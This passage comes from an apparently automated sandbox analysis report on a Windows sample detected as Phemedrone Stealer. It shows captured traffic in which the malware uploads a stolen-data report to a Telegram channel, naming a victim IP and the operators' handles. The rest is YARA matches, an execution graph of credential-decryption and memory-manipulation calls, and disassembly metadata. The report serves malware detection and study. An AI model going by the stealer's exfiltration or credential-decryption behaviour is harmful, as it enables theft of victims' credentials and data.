                                                                                          2024-12-17 08:45:12 UTC16355OUTData Raw: 1e 84 a4 85 cf e7 9b a7 b7 cf 0d 8f ab 04 19 e4 0c b5 73 49 e8 ce ec e5 70 51 81 33 e0 02 38 0a 89 c6 1d e3 6d 13 37 2f 7c a1 84 9c a8 ba 48 09 00 2e 56 19 1f bd 65 90 0c a6 dd 84 a6 1a 93 a3 c1 06 95 bb b4 d6 16 d2 a4 13 e2 9b 98 1a 8d 02 ca 2a 82 fd e1 c0 f9 3e ba 47 22 61 dd 7f 28 90 a8 42 f4 64 f5 6b e2 a1 5e 41 da 71 ce c6 06 15 c7 a0 5f cd d3 10 8c 81 8b 6c b8 f6 94 a2 1d 91 f0 f4 39 f3 03 16 a5 ce f5 af e0 27 f5 47 d5 2d 40 52 e9 f8 39 46 d7 73 03 7a a1 34 15 8c 7e f3 7c 96 95 da 4e ba 0e 21 3d 4c 7c d0 ec 4d 2c 83 b7 b9 48 dd 5c 16 c2 3f 02 6b 54 01 e6 a3 2a 2e ff 98 ba 4e bc 4f 82 ef ba bc 50 99 35 b6 52 37 e5 88 86 12 86 c9 c8 e3 d3 93 84 6c b5 92 90 12 20 f7 60 8a 4c 4f 54 e5 4d e6 9a 53 9f e2 e2 41 b7 a0 38 ef 24 b0 f5 7a b8 b1 dc 7d 27 27 77
                                                                                          Data Ascii: sIpQ38m7/|H.Ve*>G"a(Bdk^Aq_l9'G-@R9Fsz4~|N!=L|M,H\?kT*.NOP5R7l `LOTMSA8$z}''w
                                                                                          2024-12-17 08:45:12 UTC25INHTTP/1.1 100 Continue
                                                                                          2024-12-17 08:45:14 UTC1250INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Tue, 17 Dec 2024 08:45:14 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 862
                                                                                          Connection: close
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                          {"ok":true,"result":{"message_id":6201,"sender_chat":{"id":-1002313196419,"title":"fdsfgwqergwerghrew","type":"channel"},"chat":{"id":-1002313196419,"title":"fdsfgwqergwerghrew","type":"channel"},"date":1734425113,"document":{"file_name":"[US]8.46.123.189-Phemedrone-Report.phem","file_id":"BQACAgIAAyEGAASJ4JODAAIYOWdhOhldu7q_oZFGEdjbivgdQYi1AAK5YgACHE0JS3BrCfjaH9_9NgQ","file_unique_id":"AgADuWIAAhxNCUs","file_size":732784},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 8.46.123.189 (United States)\n - Tag: Default (Tivotop)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":106,"type":"pre"},{"offset":165,"length":16,"type":"mention"}]}}


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:03:44:57
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Users\user\Desktop\Ls4O6Pmixd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\Ls4O6Pmixd.exe"
                                                                                          Imagebase:0x50000
                                                                                          File size:653'312 bytes
                                                                                          MD5 hash:16E8183843E73D742EE2F2D334B8C6C0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1426211711.00000000127C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.9%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:32%
                                                                                            Total number of Nodes:100
                                                                                            Total number of Limit Nodes:12
                                                                                            execution_graph 40160 7ffaac54f69d 40162 7ffaac54f6bf 40160->40162 40161 7ffaac54f80b LoadLibraryA 40163 7ffaac54f85f 40161->40163 40162->40161 40162->40162 40066 7ffaac545805 40069 7ffaac54580d 40066->40069 40067 7ffaac545c26 40069->40067 40070 7ffaac540d24 CryptUnprotectData 40069->40070 40070->40069 40093 7ffaac5369e4 40094 7ffaac5369ed NtClose 40093->40094 40096 7ffaac536a96 40094->40096 40164 7ffaac5583a9 40165 7ffaac54f4a0 CryptUnprotectData 40164->40165 40166 7ffaac5583ae 40165->40166 40149 7ffaac5486c2 40154 7ffaac54848b 40149->40154 40150 7ffaac540eb8 CryptUnprotectData 40150->40154 40151 7ffaac540e40 CryptUnprotectData 40151->40154 40152 7ffaac5491a1 40153 7ffaac542fc8 CryptUnprotectData 40153->40154 40154->40150 40154->40151 40154->40152 40154->40153 40155 7ffaac5413c8 CryptUnprotectData 40154->40155 40155->40154 40156 7ffaac536ac8 40157 7ffaac536ad1 NtProtectVirtualMemory 40156->40157 40159 7ffaac536bc5 40157->40159 40167 7ffaac5376a8 40168 7ffaac5376b1 NtDeviceIoControlFile 40167->40168 40170 7ffaac5377ce 40168->40170 40183 7ffaac536e48 40184 7ffaac536e51 NtUnmapViewOfSection 40183->40184 40186 7ffaac536efe 40184->40186 40097 7ffaac548be3 40121 7ffaac5413c8 40097->40121 40099 7ffaac548bee 40100 7ffaac5413c8 CryptUnprotectData 40099->40100 40105 7ffaac5491a1 40099->40105 40104 7ffaac548cc0 40100->40104 40101 7ffaac542fc8 CryptUnprotectData 40108 7ffaac54848b 40101->40108 40104->40101 40104->40105 40107 7ffaac5413c8 CryptUnprotectData 40107->40108 40108->40105 40108->40107 40109 7ffaac540eb8 40108->40109 40113 7ffaac540e40 40108->40113 40117 7ffaac542fc8 40108->40117 40110 7ffaac5508b0 40109->40110 40125 7ffaac5432b0 40110->40125 40112 7ffaac550a2b 40112->40108 40114 7ffaac550900 40113->40114 40115 7ffaac5432b0 CryptUnprotectData 40114->40115 40116 7ffaac550a2b 40115->40116 40116->40108 40120 7ffaac550af0 40117->40120 40118 7ffaac550ba6 40118->40108 40119 7ffaac5414a8 CryptUnprotectData 40119->40120 40120->40118 40120->40119 40122 7ffaac550b50 40121->40122 40123 7ffaac550ba6 40122->40123 40124 7ffaac5414a8 CryptUnprotectData 40122->40124 40123->40099 40124->40122 40128 7ffaac550aa0 40125->40128 40126 7ffaac550ba6 40126->40112 40128->40126 40129 7ffaac5414a8 40128->40129 40133 7ffaac550db0 40129->40133 40130 7ffaac551108 40132 7ffaac551124 40130->40132 40139 7ffaac54efe0 CryptUnprotectData 40130->40139 40132->40128 40133->40130 40135 7ffaac541a60 40133->40135 40136 7ffaac5511f0 40135->40136 40138 7ffaac55128d 40136->40138 40140 7ffaac54efe0 CryptUnprotectData 40136->40140 40138->40130 40139->40132 40140->40138 40187 7ffaac549c43 40189 7ffaac5497f8 40187->40189 40188 7ffaac549f5d 40189->40188 40190 7ffaac5413c8 CryptUnprotectData 40189->40190 40190->40189 40071 7ffaac54f305 40073 7ffaac54f313 40071->40073 40072 7ffaac54f412 40073->40072 40076 7ffaac5431e0 40073->40076 40075 7ffaac54f543 40079 7ffaac54fc50 40076->40079 40077 7ffaac54fc6b 40078 7ffaac54fddc CryptUnprotectData 40080 7ffaac54fe29 40078->40080 40079->40077 40079->40078 40080->40075 40179 7ffaac53706d 40180 7ffaac53707b NtOpenFile 40179->40180 40182 7ffaac53717e 40180->40182 40081 7ffaac537410 40082 7ffaac537419 NtMapViewOfSection 40081->40082 40084 7ffaac537564 40082->40084 40171 7ffaac5371b1 40172 7ffaac5371bf NtCreateSection 40171->40172 40174 7ffaac5372d7 40172->40174 40085 7ffaac551b17 40088 7ffaac54f4a0 40085->40088 40087 7ffaac551b1c 40090 7ffaac54f4ba 40088->40090 40089 7ffaac54f560 40089->40087 40090->40089 40091 7ffaac5431e0 CryptUnprotectData 40090->40091 40092 7ffaac54f543 40091->40092 40092->40087 40145 7ffaac536bf9 40146 7ffaac536c07 NtAllocateVirtualMemory 40145->40146 40148 7ffaac536cfb 40146->40148 40175 7ffaac537599 40176 7ffaac5375a7 NtQueryVolumeInformationFile 40175->40176 40178 7ffaac537677 40176->40178

                                                                                            Executed Functions

                                                                                            Function 00007FFAAC52F540 Relevance: 12.6, Strings: 8, Instructions: 2626COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$6$0#$0W$0W$p]$p]$x!
                                                                                            • API String ID: 0-4112077634
                                                                                            • Opcode ID: 1ba552c15d52cc76e2eea739d4aefdd034baa6f9b6a5ebc622ce49a422267af3
                                                                                            • Instruction ID: a852e272ecad0e6b7c2de0cb417f1872228e09fca4dbda7f6744e96cb3b00c74
                                                                                            • Opcode Fuzzy Hash: 1ba552c15d52cc76e2eea739d4aefdd034baa6f9b6a5ebc622ce49a422267af3
                                                                                            • Instruction Fuzzy Hash: 0F03C831E5861A8FEB5CDB2C885567873E5FB95300F1481B9E88ED7292DE34EC468BC1
                                                                                            Function 00007FFAAC54BB97 Relevance: 12.4, Strings: 9, Instructions: 1157COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: _$r6$r6$r6$r6$r6$r6$r6$r6
                                                                                            • API String ID: 0-3859918097
                                                                                            • Opcode ID: e27fdc2ddbb6e8e6913bb2bc93653bc8fd2620f5e26d000ff60f825975160f8c
                                                                                            • Instruction ID: c65e85f81cf7cbd6dd004fb9dcfc484a5e4c967033130ca8c86087d26d21f813
                                                                                            • Opcode Fuzzy Hash: e27fdc2ddbb6e8e6913bb2bc93653bc8fd2620f5e26d000ff60f825975160f8c
                                                                                            • Instruction Fuzzy Hash: F8824D30A9990A8BF658DB18C55577573D6EF96305F6480BCE00E87282DF2AFC86C6C1
                                                                                            Function 00007FFAAC52EEE0 Relevance: 7.0, Strings: 5, Instructions: 752COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0K_H$0W$P*$P/$[
                                                                                            • API String ID: 0-4052603944
                                                                                            • Opcode ID: 6cbecccdb6bc0d55ce93fa1e36fde824c6ec9b2843acaa33913baff1fb860791
                                                                                            • Instruction ID: 4bb3a89873156492028d1f5bfa28cd2e70bca361d83ca0e240f609b12d79b14d
                                                                                            • Opcode Fuzzy Hash: 6cbecccdb6bc0d55ce93fa1e36fde824c6ec9b2843acaa33913baff1fb860791
                                                                                            • Instruction Fuzzy Hash: D6227932B4EA4A8FF758976CA85517577D6EF9631071482BAE00EC7397ED24EC0A87C0
                                                                                            Function 00007FFAAC553E00 Relevance: 5.8, Strings: 4, Instructions: 756COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1721 7ffaac553e00-7ffaac553e16 1722 7ffaac553e31-7ffaac553e7e 1721->1722 1723 7ffaac553e18-7ffaac553e2e 1721->1723 1726 7ffaac554083-7ffaac554099 1722->1726 1727 7ffaac553e84-7ffaac553e9e 1722->1727 1723->1722 1732 7ffaac55409b 1726->1732 1733 7ffaac55409d-7ffaac5540c9 1726->1733 1730 7ffaac553f39-7ffaac553f48 1727->1730 1731 7ffaac553ea4-7ffaac553eb7 1727->1731 1730->1726 1734 7ffaac553f4e-7ffaac553fa1 call 7ffaac53fad0 * 2 1730->1734 1742 7ffaac553ebd-7ffaac553ec8 call 7ffaac5433f0 1731->1742 1743 7ffaac553fa8-7ffaac553fb7 1731->1743 1732->1733 1735 7ffaac5540dd-7ffaac5540e8 1732->1735 1739 7ffaac5540cb-7ffaac5540dc 1733->1739 1740 7ffaac5540e9-7ffaac55414a 1733->1740 1734->1743 1739->1735 1764 7ffaac554150-7ffaac554153 1740->1764 1765 7ffaac554218-7ffaac55421a 1740->1765 1755 7ffaac553ece-7ffaac553ee7 1742->1755 1756 7ffaac554017-7ffaac554026 1742->1756 1743->1726 1747 7ffaac553fbd-7ffaac553fd4 1743->1747 1757 7ffaac553fd6-7ffaac554010 call 7ffaac53fad0 * 2 1747->1757 1758 7ffaac554039-7ffaac554082 call 7ffaac53fad0 * 2 1747->1758 1755->1726 1775 7ffaac553eed-7ffaac553f1b 1755->1775 1756->1726 1761 7ffaac554028-7ffaac554035 1756->1761 1757->1756 1758->1726 1761->1758 1770 7ffaac55419c-7ffaac5541c0 call 7ffaac542848 1764->1770 1771 7ffaac554155-7ffaac554161 1764->1771 1772 7ffaac55421c-7ffaac55422b 1765->1772 1773 7ffaac5541c2-7ffaac5541cb call 7ffaac541d58 1765->1773 1770->1772 1770->1773 1778 7ffaac55425c-7ffaac5542b1 1771->1778 1779 7ffaac554167-7ffaac55419b 1771->1779 1786 7ffaac5541d0-7ffaac5541e2 1773->1786 1775->1730 1801 7ffaac5542fb 1778->1801 1802 7ffaac5542b3-7ffaac5542c3 1778->1802 1795 7ffaac55422c-7ffaac55425b call 7ffaac542848 1786->1795 1796 7ffaac5541e4-7ffaac5541f0 1786->1796 1796->1778 1799 7ffaac5541f2-7ffaac554215 1796->1799 1799->1765 1804 7ffaac55430c call 7ffaac541d60 1801->1804 1805 7ffaac5542fc 1801->1805 1807 7ffaac5542c9-7ffaac5542f8 1802->1807 1808 7ffaac554425-7ffaac554463 1802->1808 1814 7ffaac554311-7ffaac554343 1804->1814 1805->1808 1810 7ffaac5542fd-7ffaac554309 1805->1810 1807->1801 1818 7ffaac5544ea-7ffaac554509 1808->1818 1819 7ffaac554469-7ffaac55448c 1808->1819 1810->1804 1814->1808 1820 7ffaac554349-7ffaac55436d 1814->1820 1824 7ffaac55450b-7ffaac55450f 1818->1824 1825 7ffaac554572-7ffaac554577 1818->1825 1819->1818 1826 7ffaac55448e-7ffaac5544a1 1819->1826 1827 7ffaac55436f-7ffaac554389 call 7ffaac542b40 1820->1827 1828 7ffaac5543c5-7ffaac5543cb 1820->1828 1830 7ffaac55457e 1825->1830 1831 7ffaac554579-7ffaac55457c 1825->1831 1842 7ffaac5544ac-7ffaac5544c6 1826->1842 1843 7ffaac5544a3-7ffaac5544ab 1826->1843 1839 7ffaac5543be-7ffaac5543c3 1827->1839 1840 7ffaac55438b-7ffaac554390 1827->1840 1832 7ffaac5543de-7ffaac5543ea 1828->1832 1833 7ffaac5543cd-7ffaac5543dd 1828->1833 1835 7ffaac554580-7ffaac5545ab 1830->1835 1831->1835 1832->1808 1836 7ffaac5543ec-7ffaac554424 call 7ffaac53fad0 1832->1836 1836->1808 1839->1827 1839->1828 1844 7ffaac554393-7ffaac554396 1840->1844 1842->1818 1853 7ffaac5544c8-7ffaac5544e9 1842->1853 1844->1808 1848 7ffaac55439c-7ffaac5543a8 1844->1848 1848->1808 1851 7ffaac5543aa-7ffaac5543bc 1848->1851 1851->1839 1851->1844
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: r6$r6$r6$r6
                                                                                            • API String ID: 0-1756432014
                                                                                            • Opcode ID: ac2d65c49c12faf3560345b3fdf4ec2f5bef73963d6b0a6081cb420abe17f782
                                                                                            • Instruction ID: 1764a0ec3f8e871781352e72f2be167c86e4c7f44a68a826d3e89665f0a60975
                                                                                            • Opcode Fuzzy Hash: ac2d65c49c12faf3560345b3fdf4ec2f5bef73963d6b0a6081cb420abe17f782
                                                                                            • Instruction Fuzzy Hash: C032F630A8DA4A8FE758DB2CC49597577E1EF95300B1485BDE04FC72A6DE26EC4AC780
                                                                                            Function 00007FFAAC529ED0 Relevance: 5.5, Strings: 4, Instructions: 512COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2223 7ffaac529ed0-7ffaac529eec 2224 7ffaac529efd-7ffaac529f04 2223->2224 2225 7ffaac529eee-7ffaac529ef3 2223->2225 2226 7ffaac529f26-7ffaac529f65 2224->2226 2227 7ffaac529f06-7ffaac529f25 2224->2227 2225->2224 2231 7ffaac529faf-7ffaac529fb4 2226->2231 2232 7ffaac529f67-7ffaac529f91 2226->2232 2237 7ffaac529fb5 2231->2237 2238 7ffaac529fd8-7ffaac529ffa 2231->2238 2233 7ffaac529f96-7ffaac529fae call 7ffaac529ed0 2232->2233 2233->2231 2240 7ffaac529fb6-7ffaac529fb9 2237->2240 2239 7ffaac529ffc-7ffaac52a01e call 7ffaac529140 2238->2239 2239->2238 2248 7ffaac52a020-7ffaac52a036 2239->2248 2240->2239 2241 7ffaac529fbb-7ffaac529fd6 call 7ffaac528cb0 2240->2241 2241->2238 2241->2240 2248->2238 2250 7ffaac52a038-7ffaac52a055 call 7ffaac520948 2248->2250 2250->2233 2253 7ffaac52a05b-7ffaac52a08c 2250->2253 2256 7ffaac52a092-7ffaac52a098 2253->2256 2257 7ffaac52a199-7ffaac52a1e6 call 7ffaac529b90 2253->2257 2256->2233 2258 7ffaac52a09e-7ffaac52a0d4 2256->2258 2262 7ffaac52a24d-7ffaac52a2c9 call 7ffaac529b90 call 7ffaac520cf0 call 7ffaac529e80 call 7ffaac528ef0 2257->2262 2263 7ffaac52a1e8-7ffaac52a1ee 2257->2263 2258->2233 2264 7ffaac52a0da-7ffaac52a0f1 2258->2264 2294 7ffaac52a2cb-7ffaac52a2ce 2262->2294 2295 7ffaac52a322 2262->2295 2263->2233 2265 7ffaac52a1f4-7ffaac52a1fd 2263->2265 2264->2233 2267 7ffaac52a0f7 2264->2267 2268 7ffaac52a410-7ffaac52a435 2265->2268 2269 7ffaac52a203-7ffaac52a20d 2265->2269 2271 7ffaac52a16e-7ffaac52a176 2267->2271 2276 7ffaac52a43c-7ffaac52a441 2268->2276 2269->2238 2272 7ffaac52a213-7ffaac52a229 2269->2272 2271->2233 2275 7ffaac52a17c-7ffaac52a18d 2271->2275 2272->2276 2277 7ffaac52a22f-7ffaac52a247 2272->2277 2279 7ffaac52a193 2275->2279 2280 7ffaac52a0f9-7ffaac52a11a call 7ffaac529ed0 2275->2280 2277->2262 2281 7ffaac52a40a 2277->2281 2279->2257 2291 7ffaac52a11c-7ffaac52a126 2280->2291 2292 7ffaac52a12d-7ffaac52a152 call 7ffaac529b90 call 7ffaac520700 call 7ffaac520a40 2280->2292 2281->2268 2291->2292 2324 7ffaac52a157-7ffaac52a169 2292->2324 2297 7ffaac52a2d0-7ffaac52a2d2 2294->2297 2298 7ffaac52a34f-7ffaac52a35a 2294->2298 2300 7ffaac52a323-7ffaac52a32a 2295->2300 2301 7ffaac52a369-7ffaac52a370 2295->2301 2302 7ffaac52a34e 2297->2302 2303 7ffaac52a2d4 2297->2303 2310 7ffaac52a361-7ffaac52a366 2298->2310 2306 7ffaac52a32b-7ffaac52a332 2300->2306 2313 7ffaac52a38c-7ffaac52a39f call 7ffaac520700 2301->2313 2302->2298 2307 7ffaac52a318-7ffaac52a31b 2303->2307 2308 7ffaac52a2d6-7ffaac52a2de 2303->2308 2306->2310 2311 7ffaac52a333 2306->2311 2307->2313 2314 7ffaac52a31d-7ffaac52a321 2307->2314 2308->2307 2310->2301 2311->2310 2316 7ffaac52a335-7ffaac52a343 2311->2316 2317 7ffaac52a3a2-7ffaac52a3a9 2313->2317 2314->2295 2314->2317 2320 7ffaac52a35c 2316->2320 2321 7ffaac52a345-7ffaac52a34d 2316->2321 2317->2306 2326 7ffaac52a3ab-7ffaac52a3ac 2317->2326 2320->2310 2321->2302 2324->2271 2327 7ffaac52a3ad-7ffaac52a3c8 2326->2327 2329 7ffaac52a3ca-7ffaac52a3d2 2327->2329 2330 7ffaac52a3f8-7ffaac52a409 2327->2330 2329->2327 2331 7ffaac52a3d4-7ffaac52a3f3 call 7ffaac5209d0 call 7ffaac529240 2329->2331 2331->2330
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$"?(P$I$MQ3X
                                                                                            • API String ID: 0-1281571121
                                                                                            • Opcode ID: 6a31e60a91c91c8efb48b428ea8708021942df4855a88de1570a4c09ac2ca1b4
                                                                                            • Instruction ID: 69370ddb907b19b7a48660e60deb78d1869fe16f096d63651edf52409a04430b
                                                                                            • Opcode Fuzzy Hash: 6a31e60a91c91c8efb48b428ea8708021942df4855a88de1570a4c09ac2ca1b4
                                                                                            • Instruction Fuzzy Hash: 03F1E732B5990B8FFB98DB2884556BD73D6EFD5310B154179E00EDB2D2ED24EC4A8780
                                                                                            Function 00007FFAAC529F48 Relevance: 4.0, Strings: 3, Instructions: 270COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$"?(P$I
                                                                                            • API String ID: 0-106835810
                                                                                            • Opcode ID: d880052ae330b4519f1f0b4ba87629e0902620e0f90eb8a109cf61119ecbb5bf
                                                                                            • Instruction ID: 4a7fbe362cab756e9d3b476687c99ad069d3ec812874940cfba3eeb1846aeb46
                                                                                            • Opcode Fuzzy Hash: d880052ae330b4519f1f0b4ba87629e0902620e0f90eb8a109cf61119ecbb5bf
                                                                                            • Instruction Fuzzy Hash: 30810722A5A94B8FFB9C9729885527D62C7EBD9210F558179E00ECB3D1FD38EC0A4780
                                                                                            Function 00007FFAAC520710 Relevance: 4.0, Strings: 3, Instructions: 270COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 3269 7ffaac520710-7ffaac529f65 3271 7ffaac529faf-7ffaac529fb4 3269->3271 3272 7ffaac529f67-7ffaac529f91 3269->3272 3277 7ffaac529fb5 3271->3277 3278 7ffaac529fd8-7ffaac529ffa 3271->3278 3273 7ffaac529f96-7ffaac529fae call 7ffaac529ed0 3272->3273 3273->3271 3280 7ffaac529fb6-7ffaac529fb9 3277->3280 3279 7ffaac529ffc-7ffaac52a01e call 7ffaac529140 3278->3279 3279->3278 3288 7ffaac52a020-7ffaac52a036 3279->3288 3280->3279 3281 7ffaac529fbb-7ffaac529fd6 call 7ffaac528cb0 3280->3281 3281->3278 3281->3280 3288->3278 3290 7ffaac52a038-7ffaac52a041 call 7ffaac520948 3288->3290 3292 7ffaac52a046-7ffaac52a055 3290->3292 3292->3273 3293 7ffaac52a05b-7ffaac52a08c 3292->3293 3296 7ffaac52a092-7ffaac52a098 3293->3296 3297 7ffaac52a199-7ffaac52a1e6 call 7ffaac529b90 3293->3297 3296->3273 3298 7ffaac52a09e-7ffaac52a0d4 3296->3298 3302 7ffaac52a24d-7ffaac52a2c9 call 7ffaac529b90 call 7ffaac520cf0 call 7ffaac529e80 call 7ffaac528ef0 3297->3302 3303 7ffaac52a1e8-7ffaac52a1ee 3297->3303 3298->3273 3304 7ffaac52a0da-7ffaac52a0f1 3298->3304 3334 7ffaac52a2cb-7ffaac52a2ce 3302->3334 3335 7ffaac52a322 3302->3335 3303->3273 3305 7ffaac52a1f4-7ffaac52a1fd 3303->3305 3304->3273 3307 7ffaac52a0f7 3304->3307 3308 7ffaac52a410-7ffaac52a435 3305->3308 3309 7ffaac52a203-7ffaac52a20d 3305->3309 3311 7ffaac52a16e-7ffaac52a176 3307->3311 3316 7ffaac52a43c-7ffaac52a441 3308->3316 3309->3278 3312 7ffaac52a213-7ffaac52a229 3309->3312 3311->3273 3315 7ffaac52a17c-7ffaac52a18d 3311->3315 3312->3316 3317 7ffaac52a22f-7ffaac52a247 3312->3317 3319 7ffaac52a193 3315->3319 3320 7ffaac52a0f9-7ffaac52a11a call 7ffaac529ed0 3315->3320 3317->3302 3321 7ffaac52a40a 3317->3321 3319->3297 3331 7ffaac52a11c-7ffaac52a126 3320->3331 3332 7ffaac52a12d-7ffaac52a146 call 7ffaac529b90 call 7ffaac520700 call 7ffaac520a40 3320->3332 3321->3308 3331->3332 3358 7ffaac52a14b-7ffaac52a152 3332->3358 3337 7ffaac52a2d0-7ffaac52a2d2 3334->3337 3338 7ffaac52a34f-7ffaac52a35a 3334->3338 3340 7ffaac52a323-7ffaac52a32a 3335->3340 3341 7ffaac52a369-7ffaac52a370 3335->3341 3342 7ffaac52a34e 3337->3342 3343 7ffaac52a2d4 3337->3343 3350 7ffaac52a361-7ffaac52a366 3338->3350 3346 7ffaac52a32b-7ffaac52a332 3340->3346 3353 7ffaac52a38c-7ffaac52a39f call 7ffaac520700 3341->3353 3342->3338 3347 7ffaac52a318-7ffaac52a31b 3343->3347 3348 7ffaac52a2d6-7ffaac52a2de 3343->3348 3346->3350 3351 7ffaac52a333 3346->3351 3347->3353 3354 7ffaac52a31d-7ffaac52a321 3347->3354 3348->3347 3350->3341 3351->3350 3356 7ffaac52a335-7ffaac52a343 3351->3356 3357 7ffaac52a3a2-7ffaac52a3a9 3353->3357 3354->3335 3354->3357 3360 7ffaac52a35c 3356->3360 3361 7ffaac52a345-7ffaac52a34d 3356->3361 3357->3346 3366 7ffaac52a3ab-7ffaac52a3ac 3357->3366 3364 7ffaac52a157-7ffaac52a169 3358->3364 3360->3350 3361->3342 3364->3311 3367 7ffaac52a3ad-7ffaac52a3c8 3366->3367 3369 7ffaac52a3ca-7ffaac52a3d2 3367->3369 3370 7ffaac52a3f8-7ffaac52a409 3367->3370 3369->3367 3371 7ffaac52a3d4-7ffaac52a3f3 call 7ffaac5209d0 call 7ffaac529240 3369->3371 3371->3370
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$"?(P$I
                                                                                            • API String ID: 0-106835810
